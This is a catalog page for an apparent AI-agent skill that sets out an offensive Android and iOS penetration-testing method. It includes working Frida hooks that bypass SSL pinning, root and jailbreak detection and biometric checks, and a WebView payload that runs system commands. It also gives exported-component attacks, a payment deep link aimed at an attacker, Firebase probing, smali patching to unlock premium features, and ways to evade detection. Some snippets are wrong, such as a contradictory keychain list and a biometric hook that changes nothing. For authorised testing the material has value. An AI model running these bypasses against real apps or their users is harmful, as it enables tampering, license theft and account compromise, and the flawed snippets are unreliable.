Source profileQuality 83/100

SnailSploit/Claude-Red/Skills/mobile/offensive-mobile/SKILL.md

offensive-mobile

Mobile (Android + iOS) application penetration testing methodology. Covers static analysis (apktool/jadx for Android, class-dump/Hopper/IDA for iOS), dynamic instrumentation with Frida and Objection, SSL pinning bypass strategies, root/jailbreak detection bypass, deep-link / URL-scheme abuse, exported component attacks (Android activities, services, providers, receivers; iOS XPC, URL schemes, universal links), insecure data storage (SharedPrefs, KeyStore misuse, NSUserDefaults, Keychain ACL bypa

Source repository stars
2,808
Declared platforms
0
Static risk flags
1
Last source update
2026-05-08
Source checked
2026-08-04

Decision brief

What it does—and where it fits

Mobile (Android + iOS) application penetration testing methodology. Covers static analysis (apktool/jadx for Android, class-dump/Hopper/IDA for iOS), dynamic instrumentation with Frida and Objection, SSL pinning bypass strategies, root/jailbreak detection bypass, deep-link / URL-scheme abuse, exported component attacks (Android activities, services, provide…

Best for

    Not for

    • Tasks that require unconfirmed production actions or broad system permissions.
    • Environments where the pinned source and install steps cannot be inspected.

    Compatibility matrix

    Platform support, with evidence labels

    PlatformStatusEvidenceWhat to check
    CodexNot declaredNo explicit evidencePortability before use
    Claude CodeNot declaredNo explicit evidencePortability before use
    CursorNot declaredNo explicit evidencePortability before use
    Gemini CLINot declaredNo explicit evidencePortability before use
    Open the compatibility checker

    Installation

    Inspect first. Install second.

    The source command is displayed only when detected. A safe inspection prompt is always available so your agent can explain every action before execution.

    Source-detected install commandSource
    npx skills add https://github.com/SnailSploit/Claude-Red --skill "Skills/mobile/offensive-mobile"
    Safe inspection promptEditorial

    Inspect the Agent Skill "offensive-mobile" from https://github.com/SnailSploit/Claude-Red/blob/aeb41eca7088a703c3a35fbcba3086d4a6c1aa4e/Skills/mobile/offensive-mobile/SKILL.md at commit aeb41eca7088a703c3a35fbcba3086d4a6c1aa4e. List every install step, command, network request, credential, file read/write, external action, and rollback step. Explain whether it fits my task. Do not install or execute anything until I approve.

    Workflow

    What the source asks the agent to do

    1. 01

      Quick Workflow

      1. Static: pull the IPA/APK, decompile, dump resources/strings, identify endpoints 2. Dynamic: install on rooted/jailbroken device, hook with Frida, intercept TLS 3. Map exported attack surface: deep links, URL schemes, exported components 4. Storage / Keystore audit: where do s…

      Static: pull the IPA/APK, decompile, dump resources/strings, identify endpointsDynamic: install on rooted/jailbroken device, hook with Frida, intercept TLSMap exported attack surface: deep links, URL schemes, exported components
    2. 02

      Lab Setup

      Rooted device or Genymotion / Android Studio AVD with userdebug build

      Rooted device or Genymotion / Android Studio AVD with userdebug buildMagisk for systemless root; LSPosed for hooks; Frida server matching device archBurp / Mitmproxy with system-trusted CA via Magisk module (MagiskTrustUserCerts)
    3. 03

      Manifest review

      xmllint --format app/AndroidManifest.xml | less

      xmllint --format app/AndroidManifest.xml | less
    4. 04

      Android

      Rooted device or Genymotion / Android Studio AVD with userdebug build

      Rooted device or Genymotion / Android Studio AVD with userdebug buildMagisk for systemless root; LSPosed for hooks; Frida server matching device archBurp / Mitmproxy with system-trusted CA via Magisk module (MagiskTrustUserCerts)
    5. 05

      iOS

      Jailbroken device (palera1n / checkra1n / Dopamine depending on iOS version)

      Jailbroken device (palera1n / checkra1n / Dopamine depending on iOS version)Frida + Objection + Filza + SSH via USB (iproxy 2222 22)Burp CA installed via Settings → General → Device Management → Certificate Trust Settings

    Permission review

    Static risk signals and limitations

    Network access

    medium · line 296

    The documentation includes network, browsing, or remote request actions.

    strings app.apk | grep -E "https://[a-z0-9-]+\.firebaseio\.com"

    Network access

    medium · line 298

    The documentation includes network, browsing, or remote request actions.

    curl https://target-app.firebaseio.com/.json

    Evidence record

    Why each signal appears

    EvidenceSourceComputedTestedEditorial
    SignalValueEvidence typeMeaning
    Quality score83/100ComputedDocumentation, specificity, maintenance, and trust rules
    Repository stars2,808SourceRepository attention, not individual Skill quality
    Compatibility0 platformsSourceDeclared in the catalog source record
    Usage guideautomated source guideEditorialGenerated or reviewed according to the visible evidence level

    Pinned source

    Provenance and original SKILL.md

    Repository
    SnailSploit/Claude-Red
    Skill path
    Skills/mobile/offensive-mobile/SKILL.md
    Commit
    aeb41eca7088a703c3a35fbcba3086d4a6c1aa4e
    License
    MIT
    Collected
    2026-08-04
    Default branch
    main
    View the original SKILL.md

    Mobile (Android + iOS) — Offensive Testing Methodology

    Quick Workflow

    1. Static: pull the IPA/APK, decompile, dump resources/strings, identify endpoints
    2. Dynamic: install on rooted/jailbroken device, hook with Frida, intercept TLS
    3. Map exported attack surface: deep links, URL schemes, exported components
    4. Storage / Keystore audit: where do secrets live, what protects them
    5. API: every backend the app talks to is your scope — test like a web app

    Lab Setup

    Android

    • Rooted device or Genymotion / Android Studio AVD with userdebug build
    • Magisk for systemless root; LSPosed for hooks; Frida server matching device arch
    • Burp / Mitmproxy with system-trusted CA via Magisk module (MagiskTrustUserCerts)

    iOS

    • Jailbroken device (palera1n / checkra1n / Dopamine depending on iOS version)
    • Frida + Objection + Filza + SSH via USB (iproxy 2222 22)
    • Burp CA installed via Settings → General → Device Management → Certificate Trust Settings

    Static Analysis

    Android

    # Decode resources + smali
    apktool d app.apk -o app
    
    # Decompile to Java
    jadx -d app_src app.apk
    
    # Manifest review
    xmllint --format app/AndroidManifest.xml | less
    # Look for: android:exported="true", intent-filters, custom permissions, debuggable, allowBackup, networkSecurityConfig
    
    # Secrets and endpoints
    grep -rE '(https?://[a-z0-9.-]+|api[_-]?key|secret|token|firebase|amazonaws|appspot)' app_src/
    grep -r "Log\.[dwief]" app_src/   # leftover debug logs
    
    # Native libs
    file app/lib/*/*.so
    # RE in Ghidra/IDA; look for JNI_OnLoad and exported Java_* functions
    

    iOS

    # Pull IPA from device
    frida-ios-dump -o app.ipa "com.vendor.app"
    
    # Or via App Store via 3rd-party tools (Apple Configurator with paid acct, etc.)
    unzip app.ipa
    # Decrypt if needed (jailbroken device): bagbak / clutch
    bagbak com.vendor.app
    
    # Class dump
    class-dump-dyld -H Payload/App.app/App -o headers/
    # Or for Swift symbols, use Hopper / IDA
    
    # Strings / endpoints
    strings -a Payload/App.app/App | grep -E '(https?://|key|secret|api)'
    
    # Info.plist analysis
    plutil -p Payload/App.app/Info.plist
    # Look for: NSAppTransportSecurity exceptions, CFBundleURLTypes (URL schemes),
    # associated-domains entitlements, UIFileSharingEnabled, ATS exemptions
    

    Dynamic Analysis & Frida

    Common Hooks

    // Bypass SSL pinning (Android — generic OkHttp/CertificatePinner/TrustManager)
    Java.perform(() => {
      const X509TrustManager = Java.use('javax.net.ssl.X509TrustManager');
      const TrustManagerFactory = Java.use('javax.net.ssl.TrustManagerFactory');
      // ... full bypass scripts: codeshare.frida.re/@pcipolloni/universal-android-ssl-pinning-bypass-with-frida
    });
    
    // Bypass root detection
    Java.perform(() => {
      const File = Java.use('java.io.File');
      File.exists.implementation = function () {
        const path = this.getAbsolutePath();
        if (path.includes('su') || path.includes('Magisk')) return false;
        return this.exists();
      };
    });
    
    // iOS — bypass jailbreak detection
    const stat = Module.findExportByName(null, 'stat');
    Interceptor.attach(stat, {
      onEnter(args) {
        const path = args[0].readUtf8String();
        if (/Cydia|jailbreak|substrate|frida/i.test(path)) {
          args[0] = Memory.allocUtf8String('/nonexistent');
        }
      }
    });
    

    Objection (Frida-based shortcuts)

    objection -g com.vendor.app explore
    # Then inside:
    android sslpinning disable
    android root disable
    android hooking list activities
    android intent launch_activity com.vendor.app/.SecretActivity
    ios sslpinning disable
    ios jailbreak disable
    ios keychain dump
    

    SSL / TLS Interception

    Android Network Security Config

    App with <network-security-config> requiring its own pinned CA: edit res/xml/network_security_config.xml, repack:

    apktool b app -o app-patched.apk
    apksigner sign --ks debug.keystore app-patched.apk
    

    Or live-bypass with Frida (preferred — no recompile).

    iOS ATS / Pinning

    For pinning, use Frida hooks against SecTrustEvaluate* / NSURLSession delegate methods. ATS exceptions in Info.plist (NSAllowsArbitraryLoads) make MITM trivial without pinning.


    Exported / IPC Attack Surface

    Android — Exported Components

    drozer console connect
    > run app.package.attacksurface com.vendor.app
    > run app.activity.start --component com.vendor.app .ExportedActivity \
        --extra string url 'javascript:alert(1)'
    > run app.provider.query content://com.vendor.app.provider/secrets
    

    Targets:

    • exported="true" activities → call from another app, bypass auth
    • ContentProviders without grantUriPermissions → arbitrary read
    • Receivers handling BOOT_COMPLETED etc. with privileged actions
    • Services bound by intent extras → command injection

    Intent Redirection / PendingIntent Hijack

    // Vulnerable: PendingIntent with implicit Intent given to untrusted app
    PendingIntent.getActivity(this, 0, new Intent(), FLAG_MUTABLE)
    // Attacker fills the empty Intent → action runs with victim app's identity
    

    iOS — URL Schemes / Universal Links

    # Open custom scheme (test from another app)
    plutil -p Payload/App.app/Info.plist | grep -A 5 CFBundleURLTypes
    # Then on device:
    xcrun simctl openurl booted "vendorapp://payment?to=ATTACKER&amount=9999"
    

    Universal Links: check apple-app-site-association on the linked domain — open redirect on that domain → universal-link claim → in-app webview navigation.

    iOS XPC / Mach Services

    launchctl list | grep com.vendor enumerates the app's launch services. XPC handlers without proper audit-token validation accept messages from any process.


    Insecure Data Storage

    Android

    # On device (root), pull app data
    adb shell "su -c 'tar -cz /data/data/com.vendor.app'" > app_data.tgz
    

    Inspect:

    • shared_prefs/*.xml — preferences in plaintext
    • databases/*.db — SQLite (use sqlite3 to dump)
    • files/ — arbitrary writes
    • cache/ and external storage (sdcard/Android/data/...) — often readable across apps

    Android Keystore Misuse

    • Keys created without setUserAuthenticationRequired(true) → use any time process is running
    • AES-GCM with reused IV (devs often hardcode IV)
    • RSA without proper padding (PKCS1 v1.5 vs OAEP)

    iOS Keychain

    # Objection
    ios keychain dump
    # Look for kSecAttrAccessible values:
    #   AlwaysThisDeviceOnly  → readable when phone locked (bad for secrets)
    #   WhenUnlocked          → standard
    #   AlwaysThisDeviceOnly  → bypasses screen lock
    

    iOS Data Protection classes: NSFileProtectionNone files are readable on a jailbroken device even when locked.


    WebView Vulnerabilities

    Android addJavascriptInterface

    If the app exposes a JS bridge with reflection-capable objects, JS in any loaded page = arbitrary Java method invocation.

    // In a page loaded by the WebView
    JSBridge.getClass().forName('java.lang.Runtime')
      .getMethod('exec', String).invoke(JSBridge.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null), 'id')
    

    file:// and Content://

    WebView with setAllowFileAccessFromFileURLs(true) + a HTML attachment that the user opens → reads any file the app can.

    iOS WKWebView

    • WKWebViewConfiguration.preferences.javaScriptCanOpenWindowsAutomatically
    • wkScriptMessageHandler exposed — same JS bridge concern as Android
    • File URL load with loadFileURL and broad allowingReadAccessTo directory

    Biometric / Auth Bypass

    Android BiometricPrompt

    Apps using BiometricPrompt without binding the cryptographic operation to authentication can be bypassed by hooking the result callback.

    Java.perform(() => {
      const Cb = Java.use('androidx.biometric.BiometricPrompt$AuthenticationCallback');
      Cb.onAuthenticationSucceeded.implementation = function (r) {
        return this.onAuthenticationSucceeded(r);  // accept whatever
      };
      Cb.onAuthenticationFailed.implementation = function () { /* ignore */ };
    });
    

    iOS LAContext

    evaluatePolicy(.deviceOwnerAuthenticationWithBiometrics) — if the app trusts the boolean result without using a Keychain item bound to biometrics, you can flip it.

    const LAContext = ObjC.classes.LAContext;
    Interceptor.attach(LAContext['- evaluatePolicy:localizedReason:reply:'].implementation, {
      onEnter(args) {
        const cb = new ObjC.Block(args[4]);
        const orig = cb.implementation;
        cb.implementation = function(success, err) { orig.call(this, true, NULL); };
      }
    });
    

    The fix on the dev side is to use a biometric-bound key in the Keychain — the bypass above doesn't yield key access.


    Firebase / Cloud Misconfig (highest hit-rate)

    Firebase Realtime DB (still common)

    Pull URL from app:

    strings app.apk | grep -E "https://[a-z0-9-]+\.firebaseio\.com"
    # Test for unauth read
    curl https://target-app.firebaseio.com/.json
    # If returns data → unauth read
    

    Firestore

    Rules misconfigured to allow read, write: if true; — visible in app's REST calls. Test with anon SDK or direct REST.

    S3 / GCS / Azure Blob

    Unsigned URLs in API responses, or bucket names guessable from app package — test public-read, public-write, ACL.

    Embedded API Keys

    Google Maps key restricted properly? Stripe publishable vs secret? Twilio? AWS access keys in plaintext (still happens) → cloud takeover.

    truffleHog filesystem app_src/
    gitleaks detect --source app_src/
    

    Mobile API Testing

    The backend is the same as a web app — pivot to web/API methodology once you've extracted the endpoints. Things specific to mobile:

    • Device-bound headers (X-Device-ID, X-App-Version, X-Signature) often calculable client-side. Pull the algorithm from the binary.
    • Request signing: HMAC with key embedded in app → game over, sign anything.
    • Mobile-only endpoints that skip rate limiting because they're "behind app authentication"
    • Older API versions still alive: /api/v1/... retired in newer app, server still serving with weaker auth.
    • Push notification topics: subscribing to /topics/<predictable> may receive messages meant for others (Firebase Messaging).

    App Tampering & Repackaging

    # Patch a check (e.g. premium=true)
    # Smali edit
    sed -i 's/return-void/const\/4 v0, 0x1\n    return v0/' app/smali/com/vendor/Premium.smali
    apktool b app -o patched.apk
    apksigner sign --ks debug.keystore patched.apk
    adb install -r patched.apk
    

    For commercial bypasses, use LSPosed module so original APK isn't modified — bypasses signature checks that lock down repackaged variants.


    iOS Specifics

    Entitlements

    codesign -d --entitlements - Payload/App.app/App
    

    Look for: keychain-access-groups (cross-app keychain), com.apple.security.application-groups (shared containers), com.apple.developer.associated-domains (universal links), private entitlements (rare).

    URL Schemes from Other Apps

    [[UIApplication sharedApplication] openURL:[NSURL URLWithString:@"vendorapp://..."]];
    

    Any app can invoke any registered URL scheme. Validate sender? Most don't.

    App Groups Shared Container

    /private/var/mobile/Containers/Shared/AppGroup/<UUID>/
    

    Multiple apps from same vendor share — secrets here cross app boundary.


    Detection / Defender View

    DetectorBypass
    Frida server detection (port 27042 open)Run frida-server on alt port, use frida -H
    Magisk detection via /sbin/magiskMagisk Hide / DenyList
    Emulator detectionRun on real device, or stub Build.FINGERPRINT etc.
    iOS jailbreak detection (file existence)Frida hook stat / fopen / dlopen
    Anti-debug ptrace(PT_DENY_ATTACH)Frida-stalker-based, or kernel patch
    Certificate pinningFrida universal pinning bypass
    App attestation (Play Integrity / DeviceCheck)Hard — usually requires server-side bypass or app attestation token relay

    Engagement Checklist

    [ ] Pull IPA/APK from device
    [ ] Decompile / class-dump
    [ ] Grep for endpoints, keys, tokens
    [ ] Manifest / Info.plist review
    [ ] Static-find exported components, deep links, URL schemes
    [ ] Install on rooted/jailbroken; configure Frida
    [ ] Bypass pinning, MITM all traffic
    [ ] Test every API the app calls (web methodology)
    [ ] Test exported components from another app / drozer / runtime
    [ ] Inspect on-device storage (sharedprefs, sqlite, keychain)
    [ ] Test biometric flows for unbound auth
    [ ] Test deep links / URL schemes for auth bypass / open redirect / IDOR
    [ ] Cloud config: Firebase rules, S3 buckets, signed URLs
    [ ] Push topics / subscription model
    [ ] Device-binding / signing scheme analysis
    

    Key References

    Alternatives

    Compare before choosing

    Computed 10023,781

    alirezarezvani/claude-skills

    app-store-optimization

    App Store Optimization (ASO) toolkit for researching keywords, analyzing competitor rankings, generating metadata suggestions, and improving app visibility on Apple App Store and Google Play Store. Use when the user asks about ASO, app store rankings, app metadata, app titles and descriptions, app store listings, app visibility, or mobile app marketing on iOS or Android. Supports keyword research and scoring, competitor keyword analysis, metadata optimization, A/B test planning, launch checklist

    Computed 976,424

    trailofbits/skills

    constant-time-testing

    Constant-time testing detects timing side channels in cryptographic code. Use when auditing crypto implementations for timing vulnerabilities.

    Computed 974,922

    dotnet/skills

    test-tagging

    Analyzes test suites in any language and tags each test with standardized traits (positive, negative, critical-path, boundary, smoke, regression, integration, performance, security). Use when the user wants to categorize, audit, or label tests with traits. Works across .NET (MSTest/xUnit/NUnit/TUnit), Python (pytest), TS/JS (Jest/Vitest), Java, Go, Ruby, Rust, Swift, Kotlin, PowerShell, and C++ — auto-editing when the framework has canonical tag syntax, otherwise report-only. Do not use for writ

    Computed 97195

    PramodDutta/qaskills

    RAG Regression Testing

    Gate RAG pipelines in CI with versioned golden eval sets, per-metric thresholds, baseline drift detection, and a build that fails when retrieval or answer quality regresses.